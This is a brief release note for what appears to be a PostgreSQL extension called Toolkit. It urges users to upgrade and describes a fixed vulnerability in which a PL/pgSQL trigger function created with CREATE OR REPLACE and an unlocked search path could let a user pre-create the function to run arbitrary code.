This release contains bug fixes since the 1.5.0 release.
This release is high priority for upgrade. We strongly recommend that you
upgrade as soon as possible.
Bug Fixes
- PR #351 - Make serialize functions strict
- There's a vulnerability in Toolkit 1.5 and earlier due to the fact that it creates a PLPGSQL function using
CREATE OR REPLACEand without properly locking down the search path. This means that a user could pre-create the trigger function to run arbitrary code. To fix this we remove the trigger entirely; it no longer pulls its weight. This fix locks down our update scripts to only useCREATE OR REPLACEwhen actually necessary; while we don't yet have an exploit for the other functions, it would be unsurprising if one exists.